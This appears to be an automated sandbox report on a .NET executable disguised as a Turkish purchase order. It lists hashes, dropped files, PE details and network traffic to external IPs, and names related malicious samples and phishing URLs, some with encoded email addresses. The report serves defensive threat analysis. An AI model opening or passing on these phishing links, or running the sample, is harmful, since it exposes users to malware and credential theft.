                                                      • 172.247.146.162
                                                      CLOUDFLARENETUShttps://m.exactag.com/ai.aspx?tc=d9550673bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41tuskerdigital.com%2Fwinner%2F24968%2F%2FdHJ1bXBzdWNrc2RpY2tAbWFpbC5ydQ==Get hashmaliciousHTMLPhisherBrowse
                                                      • 104.17.2.184
                                                      AWB NO. 077-57676135055.exeGet hashmaliciousFormBookBrowse
                                                      • 172.67.146.224
                                                      http://ferjex.comGet hashmaliciousUnknownBrowse
                                                      • 104.17.2.184
                                                      RFQ 20726 - T5 7841.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 188.114.96.3
                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 188.114.97.3
                                                      Service Desk - Please verify your Account!.emlGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.17.2.184
                                                      MKCC-MEC-RFQ-115-2024.exeGet hashmaliciousFormBookBrowse
                                                      • 188.114.97.3
                                                      https://mail.pfl.fyi/v1/messages/0190749a-2f6a-7c9f-b37a-88f0ae969ede/click?link_id=0190749a-2ffa-7f41-ad16-3ecda235df51&signature=3e892faf1c0137166fda82e5ff5c6a3150c2cec9Get hashmaliciousHTMLPhisherBrowse
                                                      • 104.17.2.184
                                                      http://beetrootculture.comGet hashmaliciousUnknownBrowse
                                                      • 104.22.21.226
                                                      https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=dmFsZXJpZS5jaHJ1c2NpZWxAb3Zlcmxha2Vob3NwaXRhbC5vcmc=Get hashmaliciousHTMLPhisherBrowse
                                                      • 104.17.25.14
                                                      ACPCA9098393827383039.exeGet hashmaliciousFormBookBrowse
                                                      • 162.0.213.72
                                                      8bwKawHg0Z.exeGet hashmaliciousFormBookBrowse
                                                      • 162.0.213.94
                                                      HSBCscancopy-invoice778483-payment87476MT103.exeGet hashmaliciousFormBookBrowse
                                                      • 162.0.213.72
                                                      Adjunto confirmacion de pedido.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                      • 162.0.213.72
                                                      nJ8mJTmMf0.exeGet hashmaliciousFormBookBrowse
                                                      • 162.0.213.72
                                                      yUFX4wGvLW.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 162.54.102.167
                                                      DHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                      • 162.0.213.72
                                                      Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                      • 162.0.213.72
                                                      Potvrda narudzbe u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                      • 162.0.213.72
                                                      Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                                      • 162.0.213.72

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1172
                                                      Entropy (8bit):5.355024937536926
                                                      Encrypted:false
                                                      SSDEEP:24:3OWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:eWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                      MD5:A2B58E2A44EE011B5A5204D75F038BDD
                                                      SHA1:44E14B097A6F628F0B0663EAA3059B5F0E5D7D8E
                                                      SHA-256:397D120EAAD7512D3923B9F86ADA33D54B60CC83655021C674258AA1F2AB68F0
                                                      SHA-512:1B27BD34FF787264BAF374DD8F61CAB416FBEE5A8E3D32AC4CF1A8A690D186F22A865D86D55790CEA6D360F4FEF4A55E2742A9EB9CFD1F650BD6B0AC278D621F
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                      C:\Users\user\AppData\Local\Temp\410-3696

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\fc.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                      Category:dropped
                                                      Size (bytes):114688
                                                      Entropy (8bit):0.9746603542602881
                                                      Encrypted:false
                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csme5hsf.fwq.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gu3ek3pu.vgc.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qakqe5ur.vo2.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ts0toslt.13i.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.953736498801867
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Windows Screen Saver (13104/52) 0.07%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      File name:03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
                                                      File size:1'015'808 bytes
                                                      MD5:860575aa9868349d8cbdbe70d45098c5
                                                      SHA1:6d4f34011c4a7f06ee54a15b091e0566fc38ac78
                                                      SHA256:88fcbe786b16f3cbb9292ed742d3e284d1936b20e4567cd0318effefd61fc176
                                                      SHA512:554779fae0b140dff014a0856d01b0fa5700330f41173fbb61a1294a5972d00bdf7a56998480e57e2efa0f0bb5c9c204d75521d2d15129c5aa2478e87f101d59
                                                      SSDEEP:24576:60oTr/lDZA+eo3eYbM0T9ICEUzY7A3HCrU:6nrNDXeqeLNCEU06iI
                                                      TLSH:042523551371CB11C97E93FA60B221450772EC2D29B5FA1E8E86B0EB34F2B809595F2B
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F7................0......f.......6... ...@....@.. ....................................@................................

                                                      File Icon

                                                      Icon Hash:66666667e69c310e

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x4f36fa
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0xDAD73746 [Mon May 6 15:31:18 2086 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xf36a80x4f.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x6400.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xfc0000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xf19880x70.text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000xf17000xf1800dec21d39f434ee8ba72424a0e3dc78a2False0.9728028354684265data7.979735073551513IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0xf40000x64000x64007627b067b0a8708eca27b1cd5faf9501False0.3955078125data5.1481094651783925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0xfc0000xc0x2000d192a879050354fbc29c623cf877b05False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xf41e00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.2701612903225806
                                                      RT_ICON0xf44d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.4966216216216216
                                                      RT_ICON0xf46100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.5439765458422174
                                                      RT_ICON0xf54c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.6656137184115524
                                                      RT_ICON0xf5d800x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5021676300578035
                                                      RT_ICON0xf62f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.3157676348547718
                                                      RT_ICON0xf88b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4090056285178236
                                                      RT_ICON0xf99680x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.5859929078014184
                                                      RT_GROUP_ICON0xf9de00x76data0.6440677966101694
                                                      RT_VERSION0xf9e680x398OpenPGP Public Key0.4217391304347826
                                                      RT_MANIFEST0xfa2100x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jul 3, 2024 17:44:09.525942087 CEST4974280192.168.2.438.150.29.6
                                                      Jul 3, 2024 17:44:09.531193018 CEST804974238.150.29.6192.168.2.4
                                                      Jul 3, 2024 17:44:09.531317949 CEST4974280192.168.2.438.150.29.6
                                                      Jul 3, 2024 17:44:09.534791946 CEST4974280192.168.2.438.150.29.6
                                                      Jul 3, 2024 17:44:09.540154934 CEST804974238.150.29.6192.168.2.4
                                                      Jul 3, 2024 17:44:10.802591085 CEST804974238.150.29.6192.168.2.4
                                                      Jul 3, 2024 17:44:10.802763939 CEST804974238.150.29.6192.168.2.4
                                                      Jul 3, 2024 17:44:10.802777052 CEST804974238.150.29.6192.168.2.4
                                                      Jul 3, 2024 17:44:10.802979946 CEST4974280192.168.2.438.150.29.6
                                                      Jul 3, 2024 17:44:10.810980082 CEST4974280192.168.2.438.150.29.6
                                                      Jul 3, 2024 17:44:10.815910101 CEST804974238.150.29.6192.168.2.4
                                                      Jul 3, 2024 17:44:50.592932940 CEST4974380192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:50.598906994 CEST8049743162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:50.599045038 CEST4974380192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:50.602005959 CEST4974380192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:50.606767893 CEST8049743162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:51.149492025 CEST8049743162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:51.149632931 CEST8049743162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:51.149704933 CEST4974380192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:52.112514019 CEST4974380192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:53.147108078 CEST4974480192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:53.152034998 CEST8049744162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:53.152120113 CEST4974480192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:53.163980007 CEST4974480192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:53.168819904 CEST8049744162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:53.666820049 CEST8049744162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:53.666930914 CEST8049744162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:53.666997910 CEST4974480192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:54.675055981 CEST4974480192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:55.694055080 CEST4974580192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:55.699181080 CEST8049745162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:55.699301958 CEST4974580192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:55.702852964 CEST4974580192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:55.707822084 CEST8049745162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:55.707838058 CEST8049745162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:55.707849979 CEST8049745162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:55.707923889 CEST8049745162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:55.707932949 CEST8049745162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:55.707943916 CEST8049745162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:55.707969904 CEST8049745162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:55.707981110 CEST8049745162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:55.707989931 CEST8049745162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:56.218441010 CEST8049745162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:56.218641043 CEST8049745162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:56.218805075 CEST4974580192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:57.206224918 CEST4974580192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:58.224730015 CEST4974680192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:58.229593039 CEST8049746162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:58.229682922 CEST4974680192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:58.231606960 CEST4974680192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:58.238928080 CEST8049746162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:58.754859924 CEST8049746162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:58.754935980 CEST8049746162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:44:58.755063057 CEST4974680192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:58.757656097 CEST4974680192.168.2.4162.209.189.212
                                                      Jul 3, 2024 17:44:58.762470007 CEST8049746162.209.189.212192.168.2.4
                                                      Jul 3, 2024 17:45:03.808207989 CEST4974780192.168.2.43.33.130.190
                                                      Jul 3, 2024 17:45:03.813150883 CEST80497473.33.130.190192.168.2.4
                                                      Jul 3, 2024 17:45:03.813252926 CEST4974780192.168.2.43.33.130.190
                                                      Jul 3, 2024 17:45:03.829102039 CEST4974780192.168.2.43.33.130.190
                                                      Jul 3, 2024 17:45:03.834048033 CEST80497473.33.130.190192.168.2.4
                                                      Jul 3, 2024 17:45:04.277484894 CEST80497473.33.130.190192.168.2.4
                                                      Jul 3, 2024 17:45:04.277600050 CEST4974780192.168.2.43.33.130.190
                                                      Jul 3, 2024 17:45:05.331259966 CEST4974780192.168.2.43.33.130.190
                                                      Jul 3, 2024 17:45:05.336594105 CEST80497473.33.130.190192.168.2.4
                                                      Jul 3, 2024 17:45:06.350450039 CEST4974880192.168.2.43.33.130.190
                                                      Jul 3, 2024 17:45:06.355575085 CEST80497483.33.130.190192.168.2.4
                                                      Jul 3, 2024 17:45:06.356266022 CEST4974880192.168.2.43.33.130.190
                                                      Jul 3, 2024 17:45:06.358503103 CEST4974880192.168.2.43.33.130.190
                                                      Jul 3, 2024 17:45:06.363444090 CEST80497483.33.130.190192.168.2.4
                                                      Jul 3, 2024 17:45:06.814374924 CEST80497483.33.130.190192.168.2.4
                                                      Jul 3, 2024 17:45:06.814445972 CEST4974880192.168.2.43.33.130.190
                                                      Jul 3, 2024 17:45:07.865648985 CEST4974880192.168.2.43.33.130.190
                                                      Jul 3, 2024 17:45:07.870958090 CEST80497483.33.130.190192.168.2.4
                                                      Jul 3, 2024 17:45:08.881568909 CEST4974980192.168.2.43.33.130.190
                                                      Jul 3, 2024 17:45:08.887572050 CEST80497493.33.130.190192.168.2.4
                                                      Jul 3, 2024 17:45:08.887667894 CEST4974980192.168.2.43.33.130.190
                                                      Jul 3, 2024 17:45:08.890325069 CEST4974980192.168.2.43.33.130.190
                                                      Jul 3, 2024 17:45:08.895251036 CEST80497493.33.130.190192.168.2.4
                                                      Jul 3, 2024 17:45:08.895380974 CEST80497493.33.130.190192.168.2.4
                                                      Jul 3, 2024 17:45:08.895391941 CEST80497493.33.130.190192.168.2.4
                                                      Jul 3, 2024 17:45:08.895435095 CEST80497493.33.130.190192.168.2.4
                                                      Jul 3, 2024 17:45:08.895448923 CEST80497493.33.130.190192.168.2.4
                                                      Jul 3, 2024 17:45:08.895457029 CEST80497493.33.130.190192.168.2.4
                                                      Jul 3, 2024 17:45:08.895489931 CEST80497493.33.130.190192.168.2.4
